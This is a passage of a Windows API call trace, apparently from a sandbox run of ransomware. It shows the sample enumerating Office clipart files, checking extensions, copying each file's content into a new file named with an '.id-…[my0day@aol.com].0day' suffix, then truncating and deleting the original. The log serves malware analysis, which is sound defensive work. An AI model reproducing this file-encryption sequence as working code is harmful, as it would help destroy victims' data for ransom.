returned 4 [0272.465] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.465] lstrlenW (lpString=".xlsx") returned 5 [0272.465] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0272.465] lstrlenW (lpString=".ppt") returned 4 [0272.465] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.465] lstrlenW (lpString=".zip") returned 4 [0272.465] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.465] lstrlenW (lpString=".rar") returned 4 [0272.465] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString=".bz2") returned 4 [0272.465] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.465] lstrlenW (lpString=".7z") returned 3 [0272.466] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.466] lstrlenW (lpString=".dbf") returned 4 [0272.466] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.466] lstrlenW (lpString=".1cd") returned 4 [0272.466] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0272.466] lstrlenW (lpString=".jpg") returned 4 [0272.466] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.466] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.466] lstrlenW (lpString="DD00234_.WMF") returned 12 [0272.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.466] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=29628) returned 1 [0272.466] CloseHandle (hObject=0x388) returned 1 [0272.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 0x20 [0272.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.467] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.467] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0272.467] GetLastError () returned 0x0 [0272.467] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x73bc, lpOverlapped=0x0) returned 1 [0272.499] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x73c0, lpOverlapped=0x0) returned 1 [0272.500] ReadFile (in: hFile=0x388, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.500] WriteFile (in: hFile=0x3a0, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.500] SetEndOfFile (hFile=0x3a0) returned 1 [0272.500] CloseHandle (hObject=0x3a0) returned 1 [0272.501] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.501] SetEndOfFile (hFile=0x388) returned 1 [0272.506] CloseHandle (hObject=0x388) returned 1 [0272.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0272.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.602] lstrlenW (lpString=".doc") returned 4 [0272.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.602] lstrlenW (lpString=".docx") returned 5 [0272.602] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.602] lstrlenW (lpString=".pdf") returned 4 [0272.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.602] lstrlenW (lpString=".xls") returned 4 [0272.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.602] lstrlenW (lpString=".xlsx") returned 5 [0272.602] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.602] lstrlenW (lpString=".ppt") returned 4 [0272.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.602] lstrlenW (lpString=".zip") returned 4 [0272.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.602] lstrlenW (lpString=".rar") returned 4 [0272.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.602] lstrlenW (lpString=".bz2") returned 4 [0272.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.602] lstrlenW (lpString=".7z") returned 3 [0272.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".dbf") returned 4 [0272.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".1cd") returned 4 [0272.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".jpg") returned 4 [0272.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".doc") returned 4 [0272.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString=".docx") returned 5 [0272.603] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.603] lstrlenW (lpString=".pdf") returned 4 [0272.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString=".xls") returned 4 [0272.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.603] lstrlenW (lpString=".xlsx") returned 5 [0272.603] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.603] lstrlenW (lpString=".ppt") returned 4 [0272.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".zip") returned 4 [0272.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.603] lstrlenW (lpString=".rar") returned 4 [0272.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString=".bz2") returned 4 [0272.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString=".7z") returned 3 [0272.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.603] lstrlenW (lpString=".dbf") returned 4 [0272.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.604] lstrlenW (lpString=".1cd") returned 4 [0272.604] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 63 [0272.604] lstrlenW (lpString=".jpg") returned 4 [0272.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.604] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.604] lstrlenW (lpString="DD00372_.WMF") returned 12 [0272.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.647] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=792) returned 1 [0272.647] CloseHandle (hObject=0x398) returned 1 [0272.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 0x20 [0272.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.662] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.662] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.036] GetLastError () returned 0x0 [0273.036] ReadFile (in: hFile=0x390, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x318, lpOverlapped=0x0) returned 1 [0273.038] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x320, lpOverlapped=0x0) returned 1 [0273.039] ReadFile (in: hFile=0x390, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0273.039] WriteFile (in: hFile=0x394, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.039] SetEndOfFile (hFile=0x394) returned 1 [0273.039] CloseHandle (hObject=0x394) returned 1 [0273.039] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.039] SetEndOfFile (hFile=0x390) returned 1 [0273.041] CloseHandle (hObject=0x390) returned 1 [0273.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.073] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0273.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.073] lstrlenW (lpString=".doc") returned 4 [0273.073] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.073] lstrlenW (lpString=".docx") returned 5 [0273.073] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.073] lstrlenW (lpString=".pdf") returned 4 [0273.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString=".xls") returned 4 [0273.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.074] lstrlenW (lpString=".xlsx") returned 5 [0273.074] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.074] lstrlenW (lpString=".ppt") returned 4 [0273.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString=".zip") returned 4 [0273.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.074] lstrlenW (lpString=".rar") returned 4 [0273.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString=".bz2") returned 4 [0273.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString=".7z") returned 3 [0273.074] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString=".dbf") returned 4 [0273.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString=".1cd") returned 4 [0273.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString=".jpg") returned 4 [0273.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.074] lstrlenW (lpString=".doc") returned 4 [0273.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString=".docx") returned 5 [0273.074] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.074] lstrlenW (lpString=".pdf") returned 4 [0273.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.074] lstrlenW (lpString=".xls") returned 4 [0273.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.075] lstrlenW (lpString=".xlsx") returned 5 [0273.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.075] lstrlenW (lpString=".ppt") returned 4 [0273.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.075] lstrlenW (lpString=".zip") returned 4 [0273.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.075] lstrlenW (lpString=".rar") returned 4 [0273.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.075] lstrlenW (lpString=".bz2") returned 4 [0273.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.075] lstrlenW (lpString=".7z") returned 3 [0273.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.075] lstrlenW (lpString=".dbf") returned 4 [0273.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.075] lstrlenW (lpString=".1cd") returned 4 [0273.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0273.075] lstrlenW (lpString=".jpg") returned 4 [0273.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.075] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.075] lstrlenW (lpString="DD00419_.WMF") returned 12 [0273.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.076] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=712) returned 1 [0273.076] CloseHandle (hObject=0x394) returned 1 [0273.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 0x20 [0273.076] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.076] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.076] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.076] GetLastError () returned 0x0 [0273.076] ReadFile (in: hFile=0x394, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x2c8, lpOverlapped=0x0) returned 1 [0273.078] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0273.079] ReadFile (in: hFile=0x394, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0273.079] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.079] SetEndOfFile (hFile=0x380) returned 1 [0273.079] CloseHandle (hObject=0x380) returned 1 [0273.079] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.079] SetEndOfFile (hFile=0x394) returned 1 [0273.082] CloseHandle (hObject=0x394) returned 1 [0273.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0273.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.082] lstrlenW (lpString=".doc") returned 4 [0273.082] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.082] lstrlenW (lpString=".docx") returned 5 [0273.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.082] lstrlenW (lpString=".pdf") returned 4 [0273.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.082] lstrlenW (lpString=".xls") returned 4 [0273.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.082] lstrlenW (lpString=".xlsx") returned 5 [0273.082] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.082] lstrlenW (lpString=".ppt") returned 4 [0273.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.082] lstrlenW (lpString=".zip") returned 4 [0273.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.082] lstrlenW (lpString=".rar") returned 4 [0273.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.082] lstrlenW (lpString=".bz2") returned 4 [0273.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.082] lstrlenW (lpString=".7z") returned 3 [0273.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString=".dbf") returned 4 [0273.083] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString=".1cd") returned 4 [0273.083] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString=".jpg") returned 4 [0273.083] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString=".doc") returned 4 [0273.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString=".docx") returned 5 [0273.083] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.083] lstrlenW (lpString=".pdf") returned 4 [0273.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString=".xls") returned 4 [0273.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.083] lstrlenW (lpString=".xlsx") returned 5 [0273.083] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.083] lstrlenW (lpString=".ppt") returned 4 [0273.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.083] lstrlenW (lpString=".zip") returned 4 [0273.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.083] lstrlenW (lpString=".rar") returned 4 [0273.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString=".bz2") returned 4 [0273.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.083] lstrlenW (lpString=".7z") returned 3 [0273.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.083] lstrlenW (lpString="C:\\Program Files\\Microsoft 